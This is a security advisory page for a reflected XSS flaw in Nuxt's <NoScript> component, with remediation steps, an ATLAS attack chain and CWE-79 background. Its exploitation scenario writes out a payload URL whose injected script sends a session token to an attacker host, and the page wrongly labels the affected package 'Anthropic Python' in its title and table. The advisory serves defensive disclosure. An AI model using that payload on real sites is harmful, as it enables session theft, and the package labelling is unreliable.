GHSA-m3q2-p4fw-w38m: Anthropic Python NoScript XSS

CISO Take

Nuxt's globally registered `<NoScript>` component wrote slot content directly to `innerHTML` instead of `textContent`, bypassing Vue's standard HTML escaping and allowing unescaped attacker-controlled data to be emitted in the server-rendered `<noscript>` head element. Any Nuxt application that interpolates untrusted input (such as URL query parameters) into a `<NoScript>` slot is vulnerable to reflected XSS, where the browser's HTML parser re-processes the payload outside the noscript context and executes it as arbitrary JavaScript. With 5,435 downstream dependents, AI/ML service portals, chatbot frontends, and admin dashboards built on Nuxt could expose session tokens, Clerk/Auth credentials, or LLM API keys to attackers who deliver crafted phishing URLs to privileged users. Upgrade to nuxt@4.4.7 (v4.x) or nuxt@3.21.7 (v3.x) immediately; if blocked, audit all `<NoScript>` usages for dynamic input and switch to `useHead({ noscript: [{ textContent: escapedValue }] })` as a workaround.

Sources: GitHub Advisory ATLAS

What is the risk?

Low-to-moderate severity in isolation, but the blast radius is amplified by 5,435 downstream dependents and the prevalence of Nuxt as a frontend framework for AI SaaS products and admin interfaces. No EPSS data is available and no public exploit or active exploitation is confirmed, but the attack vector is trivial once a vulnerable code path is identified — a crafted query parameter is sufficient. The highest risk scenario involves AI platform operators with elevated privileges visiting attacker-crafted URLs, enabling session hijacking against authenticated API and compliance surfaces.

How does the attack unfold?

Reconnaissance

Attacker identifies a public Nuxt-based AI portal with query parameters reflected into <NoScript> slots via source review, URL fuzzing, or reviewing the application's open-source frontend code.

AML.T0003

Payload Delivery

Attacker crafts a malicious URL embedding a <script> tag in the vulnerable query parameter and delivers it to a privileged operator via phishing or poisoned search results.

AML.T0011.003

Exploitation

Nuxt's server-side renderer emits the unescaped payload into the <noscript> head element; the browser's HTML parser re-processes the script tag outside the noscript context and executes arbitrary JavaScript.

AML.T0049

Credential Exfiltration

The injected script exfiltrates session tokens, LLM API keys, or authentication state from browser storage to the attacker's server, enabling session hijacking and unauthorized AI platform access.

AML.T0055

Reconnaissance

Attacker identifies a public Nuxt-based AI portal with query parameters reflected into <NoScript> slots via source review, URL fuzzing, or reviewing the application's open-source frontend code.

AML.T0003

Payload Delivery

Attacker crafts a malicious URL embedding a <script> tag in the vulnerable query parameter and delivers it to a privileged operator via phishing or poisoned search results.

AML.T0011.003

Exploitation

Nuxt's server-side renderer emits the unescaped payload into the <noscript> head element; the browser's HTML parser re-processes the script tag outside the noscript context and executes arbitrary JavaScript.

AML.T0049

Credential Exfiltration

The injected script exfiltrates session tokens, LLM API keys, or authentication state from browser storage to the attacker's server, enabling session hijacking and unauthorized AI platform access.

AML.T0055

What systems are affected?

Package	Ecosystem	Vulnerable Range	Patched
Anthropic Python	npm	>= 4.0.0, < 4.4.7	`4.4.7`
3.6K 5.4K dependents Pushed 7d ago 92% patched ~2d to patch Full package profile →

Do you use Anthropic Python? You're affected.

How severe is it?

CVSS 3.1

N/A

EPSS

N/A

Exploitation Status

No known exploitation

Sophistication

Trivial

What should I do?

5 steps

Upgrade to nuxt@4.4.7 (v4.x) or nuxt@3.21.7 (v3.x) — the patch routes <NoScript> slot content through escapeHtml from @vue/shared and writes to textContent instead of innerHTML.
Audit your codebase for all <NoScript> usages with untrusted data: grep -r '<NoScript>' --include='*.vue' --include='*.astro'. Flag any that interpolate variables from route, query, props, or external sources.
If upgrade is blocked, replace <NoScript>{{ x }}</NoScript> with useHead({ noscript: [{ textContent: escapedValue }] }) after HTML-escaping escapedValue at source.
Review and harden Content Security Policy script-src directives on AI-facing applications as defense-in-depth to limit XSS impact scope.
Enable Dependabot or Renovate to catch transitive Nuxt version pulls across downstream packages.

How is it classified?

Code Execution Data Extraction Auth Bypass Framework API AML.T0011.003 - Malicious Link AML.T0049 - Exploit Public-Facing Application AML.T0055 - Unsecured Credentials

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act

Art. 9 - Risk management system

ISO 42001

A.9.2 - Information security in AI system development

NIST AI RMF

MANAGE-2.2 - Mechanisms to sustain the value of deployed AI

Frequently Asked Questions

What is GHSA-m3q2-p4fw-w38m?

Nuxt's globally registered `<NoScript>` component wrote slot content directly to `innerHTML` instead of `textContent`, bypassing Vue's standard HTML escaping and allowing unescaped attacker-controlled data to be emitted in the server-rendered `<noscript>` head element. Any Nuxt application that interpolates untrusted input (such as URL query parameters) into a `<NoScript>` slot is vulnerable to reflected XSS, where the browser's HTML parser re-processes the payload outside the noscript context and executes it as arbitrary JavaScript. With 5,435 downstream dependents, AI/ML service portals, chatbot frontends, and admin dashboards built on Nuxt could expose session tokens, Clerk/Auth credentials, or LLM API keys to attackers who deliver crafted phishing URLs to privileged users. Upgrade to nuxt@4.4.7 (v4.x) or nuxt@3.21.7 (v3.x) immediately; if blocked, audit all `<NoScript>` usages for dynamic input and switch to `useHead({ noscript: [{ textContent: escapedValue }] })` as a workaround.

Is GHSA-m3q2-p4fw-w38m actively exploited?

No confirmed active exploitation of GHSA-m3q2-p4fw-w38m has been reported, but organizations should still patch proactively.

How to fix GHSA-m3q2-p4fw-w38m?

1. Upgrade to nuxt@4.4.7 (v4.x) or nuxt@3.21.7 (v3.x) — the patch routes `<NoScript>` slot content through `escapeHtml` from `@vue/shared` and writes to `textContent` instead of `innerHTML`. 2. Audit your codebase for all `<NoScript>` usages with untrusted data: `grep -r '<NoScript>' --include='*.vue' --include='*.astro'`. Flag any that interpolate variables from route, query, props, or external sources. 3. If upgrade is blocked, replace `<NoScript>{{ x }}</NoScript>` with `useHead({ noscript: [{ textContent: escapedValue }] })` after HTML-escaping `escapedValue` at source. 4. Review and harden Content Security Policy `script-src` directives on AI-facing applications as defense-in-depth to limit XSS impact scope. 5. Enable Dependabot or Renovate to catch transitive Nuxt version pulls across downstream packages.

What systems are affected by GHSA-m3q2-p4fw-w38m?

This vulnerability affects the following AI/ML architecture patterns: AI web frontends (Nuxt-based), LLM chatbot portals and conversational AI UIs, Model administration dashboards, AI SaaS subscription and compliance platforms.

What is the CVSS score for GHSA-m3q2-p4fw-w38m?

No CVSS score has been assigned yet.

What is the AI security impact?

Affected AI Architectures

AI web frontends (Nuxt-based)LLM chatbot portals and conversational AI UIsModel administration dashboardsAI SaaS subscription and compliance platforms

MITRE ATLAS Techniques

AML.T0011.003 Malicious Link

AML.T0049 Exploit Public-Facing Application

AML.T0055 Unsecured Credentials

Compliance Controls Affected

EU AI Act: Art. 9

ISO 42001: A.9.2

NIST AI RMF: MANAGE-2.2

What are the technical details?

Original Advisory

### Impact Nuxt's globally registered `<NoScript>` component (from `@unhead/vue` head components, re-exported by Nuxt) wrote its default-slot content to the `innerHTML` of the `<noscript>` head tag, bypassing the HTML escaping that `{{ }}` interpolation normally applies in Vue templates. Applications that placed untrusted, attacker-controllable data inside a `<NoScript>` slot, for example: ```vue <NoScript>{{ route.query.banner }}</NoScript> ``` would emit that value unescaped inside `<noscript>` in the server-rendered HTML. With scripting enabled, the HTML parser treats `<noscript>` content in `<head>` under the "in head noscript" insertion mode: any tag other than `link`, `meta`, `noframes`, or `style` implicitly closes `<noscript>` and is re-processed in the head. A payload such as `<script>...</script>` therefore escapes the element and executes in the document context. Sibling head components (`<Style>`, `<Title>`) were not affected because they already routed slot text through the safe `textContent` path. ### Affected versions All currently supported versions of `nuxt` that ship the `<NoScript>` global component. ### Patches Fixed in `nuxt@4.4.7` (commit [`4b054e9d`](https://github.com/nuxt/nuxt/commit/4b054e9d95f8daf366cb144b52782047c511a66e)) and backported to `nuxt@3.21.7` (commit [`7fea9fd6`](https://github.com/nuxt/nuxt/commit/7fea9fd687f1dacbfb63db5fae5839896b017a0e)). The fix escapes `<NoScript>` slot content with `escapeHtml` from `@vue/shared` and writes it to `textContent` rather than `innerHTML`. Slot content is now rendered as text; intentional markup inside `<NoScript>` is no longer parsed as HTML. ### Workarounds Until you can upgrade: - Do not interpolate untrusted input into `<NoScript>` slots. Replace `<NoScript>{{ x }}</NoScript>` with a static string, or sanitise / HTML-escape `x` at the source. - If you must render dynamic noscript content, write the tag yourself via `useHead({ noscript: [{ textContent: escapedValue }] })` after escaping `escapedValue`. ### Credit Reported to Anthropic's coordinated vulnerability disclosure pipeline by Claude (Anthropic's AI assistant) and triaged by the Anthropic security team. Reference: ANT-2026-4NJYDFFM. Independently reported by [@alcls01111](https://github.com/alcls01111) via GitHub's coordinated disclosure flow (`GHSA-8grp-wcq9-925q`), closed as a duplicate of this advisory.

Exploitation Scenario

An adversary identifies a Nuxt-based AI threat intelligence portal or LLM chatbot dashboard that renders noscript banners dynamically from URL query parameters: `<NoScript>{{ route.query.banner }}</NoScript>`. The attacker constructs a URL such as `https://ai-portal.example.com/?banner=<script>fetch('https://attacker.io/exfil?t='+localStorage.getItem('session_token'))</script>` and delivers it via a phishing email or a poisoned result in a security community forum. When a privileged operator (e.g., a CISO or platform admin) visits the link, Nuxt's server-side renderer emits the unescaped payload inside `<noscript>` in the document head. The browser's HTML parser re-processes the `<script>` tag outside the noscript element and executes it, exfiltrating the victim's session token or LLM API key to the attacker's server — granting unauthorized access to premium intelligence feeds, compliance evidence packs, or administrative controls.

Weaknesses (CWE)

CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Primary

CWE-79 — Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'): The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

[Architecture and Design] Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482]. Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.
[Implementation, Architecture and Design] Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies. For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters. Parts of the same output document may require different encodings, which will vary depending on whether the output is in the: etc. Note that HTML Entity Encoding is only appropriate for the HTML body. Consult the XSS Prevention Cheat Sheet [REF-724] for more details on the types of encoding and escaping that are needed. HTML body Element attributes (such as src="XYZ") URIs JavaScript sections Casca

Source: MITRE CWE corpus.